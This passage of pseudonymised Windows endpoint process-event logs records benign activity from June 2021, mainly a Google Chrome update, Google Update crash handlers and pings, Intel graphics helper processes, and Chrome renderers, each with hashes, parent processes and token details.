00:53:01.408782500+00:00,5968,91.0.4472.114_91.0.4472.106_chrome_updater.exe,"""91.0.4472.114_91.0.4472.106_chrome_updater.exe"" --verbose-logging --do-not-launch-chrome --channel=stable --system-level",True,2021-06-24 00:52:58.966146700+00:00,18404,GoogleUpdate.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:53:01.888259400+00:00,2021-06-24 00:53:50.871091500+00:00,c103b1c3-ac4e-4eea-b6cd-4e94367945c9,computerpii_0a470890c60768167990033d701e7bd881398861,168515,False,10.7740.19041.1052,False,11540474045175256,,11540474045175259,2021-06-24 00:53:01.408782500+00:00,5968,2021-06-24 00:53:01.408782500+00:00,\Device\HarddiskVolume3\Program Files (x86)\Google\Update\Install\{4B8047EF-0509-4003-AAAB-3590B2C399D9}\91.0.4472.114_91.0.4472.106_chrome_updater.exe,5968,128,ActiveProcessStartkey,C:\Program Files (x86)\Google\Update\Install\{4B8047EF-0509-4003-AAAB-3590B2C399D9},2700728,2021-06-17 00:09:08+00:00,2021-06-24 00:53:00.775497900+00:00,2021-06-24 00:53:01.430063400+00:00,2021-06-24 00:53:01.351052+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome Installer,91.0.4472.114,mini_installer,,Google Chrome Installer,Google LLC,Google Chrome Installer,91.0.4472.114,setup,,Google Chrome Installer
+798,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:53:01.828506800+00:00,13496,setup.exe,"""setup.exe"" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=91.0.4472.114 --initial-client-data=0x234,0x238,0x23c,0x88,0x240,0x7ff7d709ef20,0x7ff7d709ef30,0x7ff7d709ef40",PortableExecutable,2021-06-24 00:53:01.601809800+00:00,C:\Program Files (x86)\Google\Update\Install\{4B8047EF-0509-4003-AAAB-3590B2C399D9}\FilePII_d4bd33bd6f3176b4dcfa32e406e4c0881d6aa1d0.tmp\setup.exe,2727592,7b1d631364afe53b8472ed5fcef7c7fa,7e7e36e8a12e76d11b50f90313d5a0a1fc8bac75bf5b56c8e57bd9a0c822dc4d,5c4860da314435fa3067b1404a7a7364e09022d5,7b1d631364afe53b8472ed5fcef7c7fa,7e7e36e8a12e76d11b50f90313d5a0a1fc8bac75bf5b56c8e57bd9a0c822dc4d,5c4860da314435fa3067b1404a7a7364e09022d5,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 00:53:01.729062300+00:00,2040,setup.exe,"""setup.exe"" --install-archive=""C:\Program Files (x86)\Google\Update\Install\{4B8047EF-0509-4003-AAAB-3590B2C399D9}\FilePII_d4bd33bd6f3176b4dcfa32e406e4c0881d6aa1d0.tmp\CHROME_PATCH.PACKED.7Z"" --previous-version=""91.0.4472.106"" --verbose-logging --do-not-launch-chrome --channel=stable --system-level",True,2021-06-24 00:53:01.408782500+00:00,5968,\Device\HarddiskVolume3\Program Files (x86)\Google\Update\Install\{4B8047EF-0509-4003-AAAB-3590B2C399D9}\91.0.4472.114_91.0.4472.106_chrome_updater.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:53:01.890725400+00:00,2021-06-24 00:53:50.871148700+00:00,f9ffb046-129f-4ace-96a7-cdbb3c34651d,computerpii_0a470890c60768167990033d701e7bd881398861,168516,False,10.7740.19041.1052,False,11540474045175259,,11540474045175260,2021-06-24 00:53:01.729062300+00:00,2040,2021-06-24 00:53:01.729062300+00:00,\Device\HarddiskVolume3\Program Files (x86)\Google\Update\Install\{4B8047EF-0509-4003-AAAB-3590B2C399D9}\FilePII_d4bd33bd6f3176b4dcfa32e406e4c0881d6aa1d0.tmp\setup.exe,2040,128,ActiveProcessStartkey,C:\Program Files (x86)\Google\Update\Install\{4B8047EF-0509-4003-AAAB-3590B2C399D9}\FilePII_d4bd33bd6f3176b4dcfa32e406e4c0881d6aa1d0.tmp,2727592,2021-06-17 00:09:08+00:00,2021-06-24 00:53:01.601809800+00:00,2021-06-24 00:53:01.833542+00:00,2021-06-24 00:53:01.601809800+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,256.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome Installer,91.0.4472.114,setup,,Google Chrome Installer,Google LLC,Google Chrome Installer,91.0.4472.114,setup,,Google Chrome Installer
+799,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-24 00:53:14.386498400+00:00,15444,taskhostw.exe,taskhostw.exe $(Arg0),PortableExecutable,2021-04-14 01:10:22.932389100+00:00,C:\Windows\System32\taskhostw.exe,97096,564e4806ab18f93b93d551cd10c1598e,0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad,fed4b4a753a9541389aa670c69e624be07569ccd,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:53:14.416411600+00:00,2021-06-24 00:53:50.887108800+00:00,e9ae0a55-b0a9-4d93-925f-fe36e9730485,computerpii_0a470890c60768167990033d701e7bd881398861,168563,False,10.7740.19041.1052,False,11540474045136925,,11540474045175263,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,taskhostw.exe,taskhostw.exe,Host Process for Windows Tasks
+800,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:53:14.645962600+00:00,20856,GfxDownloadWrapper.exe,"""GfxDownloadWrapper.exe"" https://gameplayapi.intel.com/api/games/getagsgames2/i510210U/?AGS ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Intel\Games\Temp\i510210U.json"" Encoding",PortableExecutable,2021-02-15 00:31:06.091571600+00:00,C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_7769fb49693b5f65\GfxDownloadWrapper.exe,171272,db43f9e1e0e9eb357b24132a2d25ca7a,d5f5f209deff9a35a31df6cb0d67133f3d29b1abbe5b8ee139585a6ac2646d0d,3baba66a80231a1160345c1f7a107789cd27dd06,b8fd0897854f7981f167e1777cd0dc9d,0eba09e7418a9d87da1edbfb77139d45af7ab11fa12ccdedb7580748eb600e2e,4a8d6e7d0e1f66810ba25052c964ddcdfa64e6eb,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:12.551513500+00:00,12112,igfxEM.exe,"""igfxEM.exe""",False,2021-06-10 00:46:10.990538100+00:00,2852,\Device\HarddiskVolume3\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_7769fb49693b5f65\igfxCUIService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:53:14.691935300+00:00,2021-06-24 00:53:50.887218300+00:00,0eb24100-8ee5-4b05-bb38-4e3e7e3e4fe2,computerpii_0a470890c60768167990033d701e7bd881398861,168566,False,10.7740.19041.1052,False,11540474045175112,,11540474045175264,2021-06-24 00:52:12.551513500+00:00,12112,2021-06-24 00:52:12.551513500+00:00,igfxEM.exe,12112,256,ActiveProcessStartkey,C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_7769fb49693b5f65,905992,2020-06-16 21:27:23+00:00,2020-06-30 20:27:02+00:00,2021-06-24 00:52:12.563394300+00:00,2021-02-15 00:31:08.020416200+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Intel Corporation,Intel(R) Common User Interface,6.15.100.8336,IGFXEM,IGFXEM.EXE,igfxEM Module,Intel Corporation,Intel® Graphics Control Panel,8.15.100.8336,GfxDownloadWrapper.exe,GfxDownloadWrapper.exe,Intel(R) Graphics Control Panel
+801,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:53:14.659153200+00:00,21216,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,db43f9e1e0e9eb357b24132a2d25ca7a,d5f5f209deff9a35a31df6cb0d67133f3d29b1abbe5b8ee139585a6ac2646d0d,3baba66a80231a1160345c1f7a107789cd27dd06,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:53:14.645962600+00:00,20856,GfxDownloadWrapper.exe,"""GfxDownloadWrapper.exe"" https://gameplayapi.intel.com/api/games/getagsgames2/i510210U/?AGS ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Intel\Games\Temp\i510210U.json"" Encoding",False,2021-06-24 00:52:12.551513500+00:00,12112,igfxEM.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:53:14.692274200+00:00,2021-06-24 00:53:50.887255+00:00,a11bd810-492b-4891-aa01-f1da78627f42,computerpii_0a470890c60768167990033d701e7bd881398861,168567,False,10.7740.19041.1052,False,11540474045175264,,11540474045175265,2021-06-24 00:53:14.645962600+00:00,20856,2021-06-24 00:53:14.645962600+00:00,\Device\HarddiskVolume3\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_7769fb49693b5f65\GfxDownloadWrapper.exe,20856,128,ActiveProcessStartkey,C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_7769fb49693b5f65,171272,2020-06-16 21:01:58+00:00,2020-06-30 20:26:16+00:00,2021-06-24 00:53:14.680188700+00:00,2021-02-15 00:31:06.091571600+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Intel Corporation,Intel® Graphics Control Panel,8.15.100.8336,GfxDownloadWrapper.exe,GfxDownloadWrapper.exe,Intel(R) Graphics Control Panel,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+802,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:53:18.016835200+00:00,9880,GoogleCrashHandler.exe,"""GoogleCrashHandler.exe""",PortableExecutable,2021-04-21 05:19:26.535730400+00:00,C:\Program Files (x86)\Google\Update\Ipv4PII_025de4296ab244d9ac811ef514f9d0b5ad63b5fd\GoogleCrashHandler.exe,293720,36cb86775385de4d906cc13b712486fc,6d67fc790835b85e7b14def65958d9b30e0f6e6bc6d4ead40960a3ca993353ed,eb686b0067eb804c9120d25004c959f938d10f29,84e8954d8afa6b6f5025ec059144cde2,7b03a99631843989c71e6f133bd71e243f33f86516bda3455784fb11d4ff6736,bbbfe48ad185ddac29259de291045b726781484d,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 00:52:58.966146700+00:00,18404,GoogleUpdate.exe,"""GoogleUpdate.exe"" /svc",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:53:18.138750600+00:00,2021-06-24 00:53:50.889823600+00:00,639c0178-c2bf-489a-ab94-0e2cd89b6869,computerpii_0a470890c60768167990033d701e7bd881398861,168638,False,10.7740.19041.1052,False,11540474045175255,,11540474045175267,2021-06-24 00:52:58.966146700+00:00,18404,2021-06-24 00:52:58.966146700+00:00,GoogleUpdate.exe,18404,2304,ActiveProcessStartkey,C:\Program Files (x86)\Google\Update,155592,2020-10-01 00:29:47+00:00,2020-11-11 01:43:44.395967800+00:00,2021-06-24 00:52:58.956026600+00:00,2020-11-11 01:43:46.330605500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Update,1.3.36.31,Google Update,GoogleUpdate.exe,Google Installer,Google LLC,Google Update,1.3.36.81,Google Update,GoogleUpdate.exe,Google Crash Handler
+803,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:53:18.022686700+00:00,9676,GoogleCrashHandler64.exe,"""GoogleCrashHandler64.exe""",PortableExecutable,2021-04-21 05:19:26.595569300+00:00,C:\Program Files (x86)\Google\Update\Ipv4PII_025de4296ab244d9ac811ef514f9d0b5ad63b5fd\GoogleCrashHandler64.exe,374616,7bd9abfc8a31fd0ec1e674feb7ad2b5b,af0d678cf5d4bdd7a364e95460eb46e94f67a5037f4e4ad28580282c22f17812,1f466c4d5857a4d454780d87dea58d582ebed991,84e8954d8afa6b6f5025ec059144cde2,7b03a99631843989c71e6f133bd71e243f33f86516bda3455784fb11d4ff6736,bbbfe48ad185ddac29259de291045b726781484d,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 00:52:58.966146700+00:00,18404,GoogleUpdate.exe,"""GoogleUpdate.exe"" /svc",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:53:18.138970900+00:00,2021-06-24 00:53:50.889859700+00:00,40341421-b64f-4c36-b0b9-3cfd5bc6c083,computerpii_0a470890c60768167990033d701e7bd881398861,168639,False,10.7740.19041.1052,False,11540474045175255,,11540474045175268,2021-06-24 00:52:58.966146700+00:00,18404,2021-06-24 00:52:58.966146700+00:00,GoogleUpdate.exe,18404,2304,ActiveProcessStartkey,C:\Program Files (x86)\Google\Update,155592,2020-10-01 00:29:47+00:00,2020-11-11 01:43:44.395967800+00:00,2021-06-24 00:52:58.956026600+00:00,2020-11-11 01:43:46.330605500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Update,1.3.36.31,Google Update,GoogleUpdate.exe,Google Installer,Google LLC,Google Update,1.3.36.81,Google Update,GoogleUpdate.exe,Google Crash Handler
+804,True,System,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeDefault,NotWeb,2021-06-24 00:53:18.097338400+00:00,20472,GoogleUpdate.exe,"""GoogleUpdate.exe"" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi44MiIgc2hlbGxfdmVyc2lvbj0iMS4zLjM2LjMxIiBpc21hY2hpbmU9IjEiIHNlc3Npb25pZD0iezAyMTU4MTQxLUEzQUMtNDNFOS1CRkZELUUyMjAyNjRGMTRFRH0iIHVzZXJpZD0ie0M2RTdERTAxLTZGMDItNDgzOC1BQjhGLUMzNTY5MzZENUVBRH0iIGluc3RhbGxzb3VyY2U9ImNvcmUiIHJlcXVlc3RpZD0ie0I3NDAyQTVFLTM5QTctNDY0My1BREQ1LTc2OUM1QkZGNzI5MH0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIxIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0My4xMDUyIiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNDLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iOTEuMC40NDcyLjEwNiIgbmV4dHZlcnNpb249IjkxLjAuNDQ3Mi4xMTQiIGFwPSJ4NjQtc3RhYmxlLXN0YXRzZGVmXzEiIGxhbmc9ImVuIiBicmFuZD0iT05HUiIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjIyNCIgaW5zdGFsbGRhdGU9IjUwNjEiIGNvaG9ydD0iMTpndToiIGNvaG9ydG5hbWU9IlN0YWJsZSI-PGV2ZW50IGV2ZW50dHlwZT0iMTIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxMyIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIvPjxldmVudCBldmVudHR5cGU9IjE0IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBkb3dubG9hZGVyPSJ3aW5odHRwIiB1cmw9Imh0dHA6Ly9lZGdlZGwubWUuZ3Z0MS5jb20vZWRnZWRsL3JlbGVhc2UyL2Nocm9tZS9KMFItcm1EWldreHd1TEFRa1lwcFN3XzkxLjAuNDQ3Mi4xMTQvOTEuMC40NDcyLjExNF85MS4wLjQ0NzIuMTA2X2Nocm9tZV91cGRhdGVyLmV4ZSIgZG93bmxvYWRlZD0iMjcwMDcyOCIgdG90YWw9IjI3MDA3MjgiIGRvd25sb2FkX3RpbWVfbXM9IjY0NyIvPjxldmVudCBldmVudHR5cGU9IjE0IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTUiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIzIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIxOTY2MDkiIHNvdXJjZV91cmxfaW5kZXg9IjAiIHVwZGF0ZV9jaGVja190aW1lX21zPSI5MDgiIGRvd25sb2FkX3RpbWVfbXM9IjczNyIgZG93bmxvYWRlZD0iMjcwMDcyOCIgdG90YWw9IjI3MDA3MjgiIGluc3RhbGxfdGltZV9tcz0iMTY2NDMiLz48L2FwcD48L3JlcXVlc3Q-",PortableExecutable,2020-11-11 01:43:46.330605500+00:00,C:\Program Files (x86)\Google\Update\GoogleUpdate.exe,155592,84e8954d8afa6b6f5025ec059144cde2,7b03a99631843989c71e6f133bd71e243f33f86516bda3455784fb11d4ff6736,bbbfe48ad185ddac29259de291045b726781484d,84e8954d8afa6b6f5025ec059144cde2,7b03a99631843989c71e6f133bd71e243f33f86516bda3455784fb11d4ff6736,bbbfe48ad185ddac29259de291045b726781484d,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 00:52:58.966146700+00:00,18404,GoogleUpdate.exe,"""GoogleUpdate.exe"" /svc",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:53:18.196241600+00:00,2021-06-24 00:53:50.889896500+00:00,eaa16d51-85ce-4c31-832e-68444deceeb6,computerpii_0a470890c60768167990033d701e7bd881398861,168640,False,10.7740.19041.1052,False,11540474045175255,,11540474045175269,2021-06-24 00:52:58.966146700+00:00,18404,2021-06-24 00:52:58.966146700+00:00,\Device\HarddiskVolume3\Program Files (x86)\Google\Update\GoogleUpdate.exe,18404,128,ActiveProcessStartkey,C:\Program Files (x86)\Google\Update,155592,2020-10-01 00:29:47+00:00,2020-11-11 01:43:44.395967800+00:00,2021-06-24 00:52:58.956026600+00:00,2020-11-11 01:43:46.330605500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,128.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Update,1.3.36.31,Google Update,GoogleUpdate.exe,Google Installer,Google LLC,Google Update,1.3.36.31,Google Update,GoogleUpdate.exe,Google Installer
+805,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 02:24:17.707231+00:00,17188,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1728,4671010153997855514,16646605996095115804,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7620 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:21.237057100+00:00,18968,chrome.exe,"""chrome.exe"" ",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:24:17.977520+00:00,2021-06-24 02:25:05.259987500+00:00,e319d78b-58a3-4104-b7aa-b473878bddcd,computerpii_0a470890c60768167990033d701e7bd881398861,173200,False,10.7740.19041.1052,False,11540474045175164,,11540474045175995,2021-06-24 00:52:21.237057100+00:00,18968,2021-06-24 00:52:21.237057100+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,18968,18560,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+806,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 02:24:17.939446900+00:00,5080,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1728,4671010153997855514,16646605996095115804,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8212 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:21.237057100+00:00,18968,chrome.exe,"""chrome.exe"" ",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:24:17.978893300+00:00,2021-06-24 02:25:05.260080900+00:00,68edd515-98c7-4b20-86b5-3228cad0dde7,computerpii_0a470890c60768167990033d701e7bd881398861,173201,False,10.7740.19041.1052,False,11540474045175164,,11540474045175996,2021-06-24 00:52:21.237057100+00:00,18968,2021-06-24 00:52:21.237057100+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,18968,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 